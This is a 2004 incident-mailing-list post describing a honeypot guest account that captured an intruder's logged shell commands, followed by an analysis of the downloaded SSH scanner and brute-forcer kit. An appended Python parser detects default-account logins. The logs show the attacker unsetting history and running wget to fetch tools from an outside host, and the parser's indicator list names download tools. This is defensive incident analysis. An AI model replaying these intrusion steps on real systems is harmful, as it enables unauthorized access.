Re: FW: [Intrusions] Linux SSH scanning - test/guest

From: Sebastian Jaenicke (sjaenick_at_TechFak.Uni-Bielefeld.DE)
Date: 09/08/04

  • Next message: Kirby Angell: "Re: Systems compromised with ShellBOT perl script - part 2"
    Date: Wed, 8 Sep 2004 02:51:52 +0200
    To: incidents@securityfocus.com
    Hi,

    On Fri, Jul 30, 2004 at 07:22:45AM -0400, M Shirk wrote:
    [..]
    > There is also a multithreaded SSH bruteforcer called "haita"
    > This attempts to login to machines using the accounts "test" and "guest",
    > with passwords "test" & "guest" respectively. It runs from a file
    > of addresses found by a synscan program. It identifies itself as
    > SSH-2.0-libssh-0.1
    >
    > So, SSH login failures for test & guest are an indication of this
    > thing running at the remote end.
    >
    > The two names & passwords appear to be hardcoded into the program.
    > Since Linux as I recall backs off after failed attempts there wouldn't be
    > much to gain by trying many more names, but variants may appear with other
    > defaults.

    I just set up an account "guest" with password "guest" and a shell modified
    to log commands via syslog[0].

    Sep 8 02:08:45 azathoth sshd[5890]: Accepted password for guest from 218.25.120.5 port 2952 ssh2
    Sep 8 02:11:24 azathoth sshd[5914]: Accepted password for guest from 82.77.67.250 port 1173 ssh2
    Sep 8 02:11:29 localhost T=2004-09-08__02:11:29 PI=5917 UI=1007 w
    Sep 8 02:11:45 localhost T=2004-09-08__02:11:45 PI=5917 UI=1007 unset HISTFILE ; unset HISTSAVE
    Sep 8 02:12:10 localhost T=2004-09-08__02:12:10 PI=5917 UI=1007 mkdir /tmp/PS
    Sep 8 02:12:17 localhost T=2004-09-08__02:12:17 PI=5917 UI=1007 cd /tmp/PS
    Sep 8 02:12:23 localhost T=2004-09-08__02:12:23 PI=5917 UI=1007 ls -a
    Sep 8 02:12:42 localhost T=2004-09-08__02:12:42 PI=5917 UI=1007 wget memphis.freehttp.com/69
    Sep 8 02:13:24 localhost T=2004-09-08__02:13:24 PI=5917 UI=1007 kill -9 0

    (All timestamps are MEST).

    Timestamps suggest all commands were typed in by hand; no
    attempt was made to compromise the target system.

    # file /tmp/PS/69
    /tmp/PS/69: gzip compressed data, from Unix
    # tar tzvf /tmp/PS/69
    drwxr-xr-x root/root 0 2004-07-12 20:10 ssh/
    -rwxr-xr-x root/root 453972 2004-07-12 20:09 ssh/ss
    -rwxr-xr-x root/root 1365263 2004-07-12 20:10 ssh/sshf
    -rwxr-xr-x root/root 85 2004-07-12 20:10 ssh/go.sh

    'ss' is a simple port scanner used to find other systems
    running an ssh server; running 'strings' on it suggests it's
    this one: [1]

    'sshf' is then used to try logging onto the systems using
    test/test and guest/guest (seems to be hardcoded).

    I've mirrored '69' at [2], just in case someone wants to
    take a closer look.

    - Sebastian

    [0] http://www.honeynet.org/tools/dcapture/bash-perassi.patch
    [1] http://www.securiteam.com/tools/5EP0B0ADFO.html
    [2] http://www.jaenicke.org/misc/69

    -- 
    Sebastian Jaenicke                                   Disce aut discede!
    whois pgpkey-C81115B1 -h whois.ripe.net|perl -ne's-^certif: *--&&print'
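The log excerpt above is exactly what a defender would want to match on: sshd authentication lines for the throwaway test/guest accounts, followed by the command lines the patched shell writes to syslog. The following is an added example, not code from Sebastian's post, the honeynet shell patch or the tools he references: a small Python parser that reads both line formats, lists the source addresses that probed the default accounts, records which of them actually got in, and flags the post-login commands that matter (disabling shell history, staging files under /tmp, pulling a download). The sample log is built from the lines in the post plus a few constructed "Failed password" lines and one unrelated publickey login so the filter has something to ignore; the indicator patterns are my own choice, not anything the post specifies.

```python
import re
from collections import defaultdict

# Accounts the post says the scanner tries, with the password equal to the name.
DEFAULT_ACCOUNTS = {"test", "guest"}

# sshd auth lines, e.g. "Accepted password for guest from 218.25.120.5 port 2952 ssh2"
SSHD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\S+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)

# Command lines written by the syslog-logging shell: "... T=<iso> PI=<pid> UI=<uid> <command>"
CMD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d) \S+ T=(?P<iso>\S+) "
    r"PI=(?P<pid>\d+) UI=(?P<uid>\d+) (?P<cmd>.*)$"
)

# Post-login behaviours worth flagging (my own indicator list, not from the post).
INDICATORS = [
    ("shell history disabled", re.compile(r"\bunset\s+HIST\w*|\bHISTFILE=")),
    ("download tool invoked", re.compile(r"\b(?:wget|curl|ftp|lynx|fetch)\b")),
    ("staging directory under /tmp", re.compile(r"\b(?:cd|mkdir)\s+/tmp\b")),
]

# Constructed sample: the lines quoted in the post, plus constructed failed
# attempts from the same source address and one unrelated key-based login.
SAMPLE_LOG = """\
Sep 8 02:05:10 azathoth sshd[5871]: Failed password for test from 218.25.120.5 port 2900 ssh2
Sep 8 02:05:12 azathoth sshd[5871]: Failed password for guest from 218.25.120.5 port 2901 ssh2
Sep 8 02:08:45 azathoth sshd[5890]: Accepted password for guest from 218.25.120.5 port 2952 ssh2
Sep 8 02:11:24 azathoth sshd[5914]: Accepted password for guest from 82.77.67.250 port 1173 ssh2
Sep 8 02:11:29 localhost T=2004-09-08__02:11:29 PI=5917 UI=1007 w
Sep 8 02:11:45 localhost T=2004-09-08__02:11:45 PI=5917 UI=1007 unset HISTFILE ; unset HISTSAVE
Sep 8 02:12:10 localhost T=2004-09-08__02:12:10 PI=5917 UI=1007 mkdir /tmp/PS
Sep 8 02:12:17 localhost T=2004-09-08__02:12:17 PI=5917 UI=1007 cd /tmp/PS
Sep 8 02:12:23 localhost T=2004-09-08__02:12:23 PI=5917 UI=1007 ls -a
Sep 8 02:12:42 localhost T=2004-09-08__02:12:42 PI=5917 UI=1007 wget memphis.freehttp.com/69
Sep 8 02:13:24 localhost T=2004-09-08__02:13:24 PI=5917 UI=1007 kill -9 0
Sep 8 03:00:00 azathoth sshd[6001]: Accepted publickey for alice from 10.0.0.7 port 40000 ssh2
"""


def parse_line(line):
    """Classify one syslog line as an sshd auth event, a logged command, or None."""
    m = SSHD_RE.match(line)
    if m:
        ev = m.groupdict()
        ev["kind"] = "auth"
        return ev
    m = CMD_RE.match(line)
    if m:
        ev = m.groupdict()
        ev["kind"] = "cmd"
        return ev
    return None


def analyze(log_text):
    """Summarise default-account probes, successful logins and flagged commands."""
    attempts = defaultdict(lambda: defaultdict(int))  # ip -> "result/user" -> count
    logins = []   # (user, ip) for accepted logins on default accounts
    flagged = []  # (pid, command, reason) for commands matching an indicator
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["kind"] == "auth":
            if ev["user"] in DEFAULT_ACCOUNTS:
                attempts[ev["ip"]][f"{ev['result']}/{ev['user']}"] += 1
                if ev["result"] == "Accepted":
                    logins.append((ev["user"], ev["ip"]))
        else:
            for reason, pattern in INDICATORS:
                if pattern.search(ev["cmd"]):
                    flagged.append((int(ev["pid"]), ev["cmd"], reason))
                    break  # one reason per command is enough for a report
    return {
        "scanner_sources": sorted(attempts),
        "attempts": {ip: dict(counts) for ip, counts in attempts.items()},
        "default_account_logins": logins,
        "flagged_commands": flagged,
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    print("sources probing test/guest:", report["scanner_sources"])
    for ip, counts in report["attempts"].items():
        print(f"  {ip}: {counts}")
    print("logins on default accounts:", report["default_account_logins"])
    for pid, cmd, reason in report["flagged_commands"]:
        print(f"  pid {pid}: {reason}: {cmd!r}")
```

Run it against a real /var/log/auth.log (or messages) by replacing SAMPLE_LOG with the file contents; the auth regex also accepts the "invalid user" form sshd emits when the account does not exist, so the same filter works on hosts where test/guest were never created and only the failed probes appear.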